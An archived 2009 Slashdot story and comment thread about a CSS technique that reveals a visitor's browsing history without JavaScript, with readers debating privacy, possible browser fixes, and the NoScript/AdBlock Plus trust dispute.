Forgot your password?
typodupeerror
Security Privacy

Sniffing Browser History Without Javascript 216

Posted by kdawson
from the hole-in-css dept.
Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."
This discussion has been archived. No new comments can be posted.

Sniffing Browser History Without Javascript

Comments Filter:
  • Re:For the Masses (Score:4, Insightful)

    by CopaceticOpus (965603) on Saturday June 13, 2009 @09:10PM (#28323829)

    Anyone who allows their browser to cache and keep a history is stupid? Perhaps your tin foil hat is a size too small.

  • Re:For the Masses (Score:5, Insightful)

    by Goaway (82658) on Saturday June 13, 2009 @09:17PM (#28323857) Homepage

    Some of us actually use the browser history.

  • by bcrowell (177657) on Saturday June 13, 2009 @09:22PM (#28323881) Homepage
    Hmm...my GP post is modded -1 troll, and the parent post, which says "This is not a troll," and explains why, is also modded -1 troll. It's too bad that you can't both mod and comment; I'd have liked to know why the mods thought there was something trollish about both posts.
  • by bcrowell (177657) on Saturday June 13, 2009 @09:28PM (#28323913) Homepage

    Stop overreacting, that is old news and long since fixed.

    Letting someone else's code run on my computer is an act of trust. Once they've shown they're untrustworthy, that's it, as far as I'm concerned. The world's best security software is no good if the author is someone who's demonstrated at least once that you can't trust him.

    NoScript is no more "malware" than Firefox itself.

    This is an interesting statement, but I don't understand your reasoning. Maybe you could explain more. Have the developers of Firefox done something untrustworthy?

    I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit,

    I don't understand how you know so much about my computer. Maybe you could explain more how you became so well informed about what's on my hard disk. I'm running Ubuntu. Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system? Are you aware of a lot of malware that's been observed in the wild infecting Ubuntu systems? If so, I'd be very interested to hear about it.

  • by bcrowell (177657) on Saturday June 13, 2009 @09:33PM (#28323943) Homepage

    It seems like it's been fixed.

    The issue isn't that the software had a bug that had to be fixed. The issue is that the author of the software has shown himself to be untrustworthy by making his software interfere with other software, for the purpose of increasing his own financial gain from ads.

  • Re:For the Masses (Score:5, Insightful)

    by MightyYar (622222) on Saturday June 13, 2009 @09:42PM (#28323973)

    Most people will never understand and basic exploits like this will always work against them.

    So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

  • Alarming? (Score:3, Insightful)

    by actionbastard (1206160) on Saturday June 13, 2009 @09:50PM (#28324015)
    From an exploit standpoint, no. From an editorial standpoint, yes.
  • by Anonymous Coward on Saturday June 13, 2009 @10:37PM (#28324169)

    Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

    Script plz?

    This has been a pet peeve of mine for ages. I've got a bunch of users in a Windows environment without Cygwin, but I'd translate the shell script into DOS .BAT if that's what it takes to solve this problem.

  • by Blue Stone (582566) on Saturday June 13, 2009 @10:51PM (#28324233) Homepage Journal

    If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to appologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

    Unless you're one of those people who believes that anyone less than perfect with a flawless record of behaviour deserves to be castigated for all time for their transgressions, i suggest you consider a concept called 'forgiveness' which, I believe is most appropriate where the transgressor shows genuine remorse. It seems applicable in this situation, but of course, I can only speak for myself.

    (I don't know the guy & I use both noscript and adblock+ with easylist)

  • by Korin43 (881732) on Sunday June 14, 2009 @12:11AM (#28324541) Homepage
    Easylist blocks ads. Easylist blocked an ad on his site. How is this their fault? They are doing exactly what they say they do.
  • by Anonymous Coward on Sunday June 14, 2009 @12:36AM (#28324657)

    You certainly speak for quite a few more than yourself. I for one am really glad someone said it - personally I think a lot of people got way too upset about this, many of which (from the arguments I've read) did not really understand the issue.

  • by BrokenHalo (565198) on Sunday June 14, 2009 @12:59AM (#28324745)
    the "no mod and comment" rule is perhaps one of the most ill-concieved rules I have seen.

    Then perhaps you haven't understood the concept behind the rule. The idea is to prevent individuals having unrestrained ability to push an agenda of their own: hence mod or post, but not both.

    Unlike some other long-standing rules on this forum, this is one that actually has very sound reasoning behind it.
  • by supernova_hq (1014429) on Sunday June 14, 2009 @02:24AM (#28324959)
    Don't confuse forgiveness with trust.

    If someone borrowed your car and backed into a telephone pole, you would be upset. If they paid for the damages, you would probably forgive them. But the question is: Would you trust them with your car..?
  • Re:Old stuff (Score:5, Insightful)

    by eiMichael (1526385) on Sunday June 14, 2009 @03:37AM (#28325181)
    Just make "visited" only apply within that domain, like a bastardized cookie. I don't care that us.gov knows which other us.gov links I've been to, but I don't want my browser reporting that I've also been to al-quada.org.
  • Re:For the Masses (Score:2, Insightful)

    by aamcf (651492) on Sunday June 14, 2009 @05:08AM (#28325403) Homepage

    Unless you're visiting illegal sites.

    Or sites that are unpopular among your peer group.

    And what about people in repressive regimes who visit illegal sites?

    By exposing your history, there is pressure on you to conform to the standards of those who hold power over you. Not a good thing.

  • Re:Will it.. (Score:2, Insightful)

    by tiananmen tank man (979067) on Sunday June 14, 2009 @11:23AM (#28326663)

    The parent post is marked informative? Informative like it is easy to tell who is a terrorist by the length of their beard?

  • by arose (644256) on Sunday June 14, 2009 @11:47AM (#28326795)

    Half apology, half counterattack.

    Most of his users want stuff blocked not look at his ads, they don't consider him or google special, why not white list all advertisers, not only his own? Not to mention the update mill and resulting page visits. If he could manage to not realize what the hell he was doing once (and I'm not sure I believe that, the default white list and updates had made me iffy even before the incident), he can do it again. I don't want to be there when that happens, not after opening adblock plus one day and seeing white lists Inever added and Inever had EasyList, just a handful of manually added rules.

Real computer scientists don't comment their code. The identifiers are so long they can't afford the disk space.

Working...